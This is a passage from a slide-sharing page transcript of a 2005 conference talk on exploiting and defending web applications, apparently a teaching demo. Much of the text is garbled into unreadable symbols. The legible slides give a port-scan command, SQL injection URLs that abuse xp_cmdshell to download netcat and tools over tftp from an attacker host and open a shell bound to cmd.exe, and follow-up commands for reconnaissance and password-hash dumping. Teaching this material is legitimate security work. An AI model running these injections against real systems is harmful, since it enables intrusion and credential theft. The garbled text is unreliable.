exploiting and defending web applications

15
1 Securitycompass.com Showcase Ontario 2005 ! "# $% %& # (# $% ) *+, ) - * . (/ - -0 # - -. # 1 ) #.-2 $ --3 4- 5 -3#$6# -$ 7’(8 ) % 9 # $% ) % :,,

Upload: guestc27cd9

Post on 18-Nov-2014

1.199 views

Category:

Technology


2 download

DESCRIPTION

 

TRANSCRIPT

Page 1: Exploiting And Defending Web Applications

1

������������ ����������������������

�����������������������������������������������������������������������

Securitycompass.comShowcase Ontario 2005

��������������

���� �����!����"#�������$�%�������%&

'�������������#�������(#�������$�%����

) *���+,�����������������������

) - �����*��������������. �����(�������/�������-��������������������������-�������0�������������#�������-���-���������.�������#�������1�

) #������.-2���������������$���������--����3�4�� ��-��5����������-3#$6#�������-$�����������7��'���(���8�������

) ��������������������%��������������������9��������� ���#�������$�%�����

) ����������%����������:,,����������������������������� ���������������

Page 2: Exploiting And Defending Web Applications

2

Securitycompass.comShowcase Ontario 2005

)���������������

Securitycompass.comShowcase Ontario 2005

4��������������������$�%�������

Page 3: Exploiting And Defending Web Applications

3

Securitycompass.comShowcase Ontario 2005

���������5���������

) #����� ����� ����#������#�����

� 3������������#������#�����

� $�����������5����%���

) ����������� ����� 3����%�����;�������

� 3��������������

� ��������������

� �������<�����

� #������%����%���

� $����������

� ���������%����%���

Securitycompass.comShowcase Ontario 2005

��������=�5���������> ����������� �������������

) 3����%�����;�������� #�����#�����(;�����������������������������%�����

) 3����'���������� �����������������������(������(����?��������������������������������

� $������(;�4@�*#4����%������

) ��������������� ��������������������������������������(���������������������������

) �������<������ �������������%�������%���������������������

Page 4: Exploiting And Defending Web Applications

4

Securitycompass.comShowcase Ontario 2005

��������=�5���������

) #������5����%���� ��������������������������������������������������������������������������������������������

) $����������� ����������������������%������������������%����������

) ���������5����%���� ����������������������������������������������

) ����������3�����������3����%������ ������������������%�����������������������������

Securitycompass.comShowcase Ontario 2005

���������������A

) #����� ����

� 3������������#������#�����

) ����������� ����

� ��������������

� �������<�����

� ���������5����%���

� 3����'���������

Page 5: Exploiting And Defending Web Applications

5

Securitycompass.comShowcase Ontario 2005

) ��������=�5���������> #����� ����

) ����#������

) 3��������������������

) #������������

Securitycompass.comShowcase Ontario 2005

����#������

) ����#������sl -bhpvt 25,53,80,443,3389,100-200 192.168.15.110

9���������������������

��������

+B6�+CD�+:�CE�� ���� ��

�� ���� ��

�� ���� ��

������ ���� ���

���� �� �������� ����

Page 6: Exploiting And Defending Web Applications

6

Securitycompass.comShowcase Ontario 2005

3���������4��#���������F��������G

Securitycompass.comShowcase Ontario 2005

#���4��#�����

�������� ������������ F$�%%�������G(;�7#�����������H����������%F;I3G(��%%������

J���� �������� H�������������������%H ����� +�K:@+�KLH ������������M4����3�.+B6�+CD�+:�++,M4����������%�.������������������%M4��������.D,M#����4�%�.9����6C+D.:D.:D6,,:HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH #����������������-#�����-��������������������(���H����������M#�����.5��������H33#@C�,H 2��������0H�������H �������.�#����4M*#' HCK,.33#%�������������������3������7����������������� ��N���������@�%�������������4��

�������-����.@@+B6�+CD�+:�++,@�%���@-�$��H6,,,H,CLB�M��������44�5������.*�43*�#(42�$�(;�4(��� M�44�%�����O42�$�O�����������������������������3������������������*#' HDEE�

Page 7: Exploiting And Defending Web Applications

7

Securitycompass.comShowcase Ontario 2005

) ��������=�5���������> ����������� ����

) �����������������������

) ������@ ���������������������

) �������<�����

) 3����'���������

Securitycompass.comShowcase Ontario 2005

������������������������

Page 8: Exploiting And Defending Web Applications

8

Securitycompass.comShowcase Ontario 2005

������@ ���������������������

) 7���������������A

� ��%�

� #����%�

� 3 ��%���

) ��%������������%�F�����G

) #����%�F���������%������������AG

) 3 ��%���F�%������3 ��%���G

������������������� �

Securitycompass.comShowcase Ontario 2005

������@ ���������������������

) �������3��������������%����%A

� �%������7���

) #����%�

� �%������7���

) 3 ��%���

� ;����F+��+,,(��������������������%���G

Page 9: Exploiting And Defending Web Applications

9

Securitycompass.comShowcase Ontario 2005

�������<�����

) 7�������%�

) #����%���������������������%�������������������������%�����F�������������G

) 7���������

) ����������������%��������

@�����%�����A���P%���������/��P+6

) 5�������PQ+��+,,R

Securitycompass.comShowcase Ontario 2005

�������<�����$�����

) $��3�������%�����A

) @�����%�����A������P�������%�����/��P��������/���P%������S��������S����������

) $���������������%������

������������������

Page 10: Exploiting And Defending Web Applications

10

Securitycompass.comShowcase Ontario 2005

���������5����%���

) I����������

) I��������������������%����

) I����%���������������������

) '���������

Securitycompass.comShowcase Ontario 2005

3����'���������> #T73�?������

) #T7��?���������������N�������������������������H��������������(��������#T7��%%��������������������������������������������������������������������

) ��������������%����������������������%%������������� ��������������������%���F��S�%������G

T&��������S�%������ A

�& ��S�%������ ����������������������������������������������������%��%%�������������������5��������#T7#������

Page 11: Exploiting And Defending Web Applications

11

Securitycompass.comShowcase Ontario 2005

3����'���������> #T73�?������$�����

) #T73�?������F��%%����������������������������G) exec master..xp_cmdshell 'tftp -i 192.168.15.67 GET

nc.exe'--[http://192.168.15.110/victim/welcome.asp?page=content_display.asp&category=2&id=2;%20exec%20master..xp_cmdshell%20'tftp -i 192.168.15.67 GET nc.exe'--]

) exec master..xp_cmdshell 'tftp -i 192.168.15.67 GET toolz.exe c:\toolz.exe'--[http://192.168.15.110/victim/welcome.asp?page=content_display.asp&category=2&id=2;%20exec%20master..xp_cmdshell%20'tftp -i 192.168.15.67 GET toolz.exe c:\toolz.exe'--]

) exec master..xp_cmdshell 'nc -v -l -p 443 -e cmd.exe’--[http://192.168.15.110/victim/welcome.asp?page=content_display.asp&category=2&id=2;%20exec%20master..xp_cmdshell%20'nc%20-v%20-l%20-p%20443%20-e%20cmd.exe'--]

Securitycompass.comShowcase Ontario 2005

�������A

$���������%����������%�������������������

nc –vvn 192.168.15.110 443

) ����3����

ipconfig /all [identify ip address]

whoami [identify account name]

tasklist /svc [services running]

) �%�����������������

pwdump3e [dump account passwords]

tasklist /svc [services running]

Page 12: Exploiting And Defending Web Applications

12

Securitycompass.comShowcase Ontario 2005

$��������������

) �%���������������7 �����

Pwdump3e \\localhost

) $�����������������

L0phtcrack or John

Securitycompass.comShowcase Ontario 2005

'����%�������%���

Page 13: Exploiting And Defending Web Applications

13

Securitycompass.comShowcase Ontario 2005

T��������

����F��G��������$�%�������%

'��������

����#�������$�%�����$�%

$������I�

Securitycompass.comShowcase Ontario 2005

#�������$�%�����$�%

) 9��������6,,L

) $����%���.� 9������+,,,�������

� 9��������#�������(3��������(#�������'������

) $��������������.� #�������$�%��������������N����%����������������������#���������������������������%���������������������%�������������������%����%����������������%���������������

Page 14: Exploiting And Defending Web Applications

14

Securitycompass.comShowcase Ontario 2005

#�������

) ������������#�������.� $��������

� ���������

) $��������.� #�������������%����@�����������4�����

� �$�%%���������������#�������������%����

� ����#�������������%���������������

� #�������3�������������������%���

� �������4�����

Securitycompass.comShowcase Ontario 2005

���������

) #�������$������.�����*�K��L ��$������

� ������ �������� �� ���������

� 7������������<�������������%�������������������������������������������

� ������ �������� �� �������������� �

� 7�����������������������������%�����������H��%%����������������������������

� ���� ��!���"

� 7�������������������������������������������

� ����!��#�� ��!���"������ ����$��� � ��

� ����������������%������������������������������

Page 15: Exploiting And Defending Web Applications

15

Securitycompass.comShowcase Ontario 2005

$�%����$������

) #�������$�%���������������������������������������������������������������������������%����������9���������(7�����(#�����U��� ����

) #�������$�%����������������������%�����������������������%����

) *������������������������������������������������������������

F2���������������$���(����3�4�� ��(3#$6#�������7��������� $���(#�������*������6,,:G

$�%����$������